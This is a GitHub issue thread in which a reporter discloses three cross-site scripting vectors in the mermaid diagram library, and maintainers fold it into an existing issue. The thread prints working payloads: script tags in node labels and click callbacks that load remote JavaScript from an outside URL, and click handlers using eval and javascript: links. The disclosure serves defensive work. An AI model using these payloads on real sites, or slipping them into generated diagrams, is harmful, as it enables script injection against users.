### ISSUE TITLE
cross site scripting in mermaid

### ISSUE THREAD

**Issue by 5alt** [knsv/mermaid#869]
Hi, I found XSS issues in mermaid. This affects all the projects that use mermaid.

There are three different ways to trigger.

The first one:
```
graph TD
B --> C{<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>}
```

The second one:
```
graph LR;
    A-->B;
    click B callback "<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>"
```

The third one(needs click, both nodes will work):
```mermaid
graph LR;
    alert`md5_salt`-->B;
    click alert`md5_salt` eval "Tooltip for a callback"
    click B "javascript:alert`salt`" "This is a tooltip for a link"
```

Here is an example that affects other projects which using mermaid.
https://github.com/hackmdio/codimd/issues/1233

And all above three payload would work on hackmd.io

Hope you can fix soon!

**Comment by knsv** [comment]
Hi, I think this is a duplicate of #847. I will close this one. I will move your example ethere. If you disagree of the overlap reopen with a comment.

**Comment by 5alt** [comment]
Hi,
https://github.com/knsv/mermaid/issues/847 is only the 1st case in this issue, and there are three cases in this issue.

I don't think your fix of  https://github.com/knsv/mermaid/issues/847 will apply for the last case.

**Comment by ThePenguin1140** [comment]
We should extend the scope of #847 then. 
@knsv has added your example to the issue so please watch it for any relevant updates. I will close this issue for now.
